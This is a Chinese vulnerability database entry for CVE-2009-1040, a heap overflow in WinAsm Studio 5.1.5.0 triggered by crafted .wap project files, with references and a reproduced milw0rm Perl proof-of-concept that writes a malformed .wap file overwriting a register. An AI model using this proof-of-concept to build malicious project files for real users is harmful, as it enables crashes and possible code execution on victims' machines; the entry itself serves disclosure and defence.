WinAsm Studio .wap项目文件处理堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117474 漏洞类型 缓冲区溢出
发布时间 2009-03-16 更新时间 2009-03-26
CVE编号 CVE-2009-1040 CNNVD-ID CNNVD-200903-359
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8224
https://cxsecurity.com/issue/WLB-2009030214
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-359
|漏洞详情
WinAsmStudio是用于使用汇编器开发32位Windows和16位DOS程序的免费集成开发环境。如果用户受骗使用WinAsmStudio处理了特制的WinAsmStudio项目文件(*.wap)的话,就可以触发堆溢出,导致执行任意代码。
|漏洞EXP
# WinAsm Studio 5.1.5.0 Local Heap Overflow Poc
# By Mountassif Moad
# D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip
# Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d
#
# Registers
# EAX 00000001
# ECX 00000001
# EDX 0013F814
# EBX 42424242  ( EBX overwrited :d )
# ESP 0013FBDC
# EBP 0013FE3C
# ESI 0013FBF7
# EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d )
# EIP 0040A927 WinAsm.0040A927
my $m=
"\x5B\x46\x49\x4C\x45\x53\x5D\x0D\x31\x3D".
"\x41" x 227 .
"\x42" x 4 .
"\x43" x 20 .
"\x0D\x5B\x50\x52".
"\x4F\x4A\x45\x43\x54\x5D\x0D\x54\x79\x70\x65\x3D\x0D\x52".
"\x65\x6C\x65\x61\x73\x65\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E".
"\x65\x3D\x0D\x44\x65\x62\x75\x67\x43\x6F\x6D\x6D\x61\x6E\x64".
"\x4C\x69\x6E\x65\x3D\x0D\x41\x75\x74\x6F\x49\x6E\x63\x46\x69".
"\x6C\x65\x56\x65\x72\x73\x69\x6F\x6E\x3D\x30\x0D\x52\x43\x53".
"\x69\x6C\x65\x6E\x74\x3D\x30\x0D\x50\x65\x6C\x6C\x65\x73\x54".
"\x6F\x6F\x6C\x73\x3D\x30\x0D\x5B\x4D\x41\x4B\x45\x5D\x0D".
"\x41\x63\x74\x69\x76\x65\x42\x75\x69\x6C\x64\x3D\x30\x0D\x43".
"\x6F\x6D\x70\x69\x6C\x65\x52\x43\x3D\x0D\x52\x43\x54\x6F\x4F".
"\x62\x6A\x3D\x0D\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63".
"\x0D\x4C\x69\x6E\x6B\x3D\x0D\x4F\x75\x74\x3D\x0D\x44".
"\x65\x62\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63\x0D\x44".
"\x65\x62\x4C\x69\x6E\x6B\x3D\x0D\x44\x65\x62\x4F\x75\x74\x3D";
print $m;
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++    WinAsm Studio 5.1.5.0 Local Heap Overflow Poc       +++\n";
print " +++    Written By Stack                                    +++\n";
print " +++    Usage Ex.: perl $0 >>Exploit.wap                    +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;

# milw0rm.com [2009-03-16]
|参考资料

来源:XF
名称:winasmstudio-wap-bo(49266)
链接:http://xforce.iss.net/xforce/xfdb/49266
来源:BID
名称:34132
链接:http://www.securityfocus.com/bid/34132
来源:MILW0RM
名称:8224
链接:http://www.milw0rm.com/exploits/8224
来源:SECUNIA
名称:34309
链接:http://secunia.com/advisories/34309
来源:OSVDB
名称:52776
链接:http://osvdb.org/52776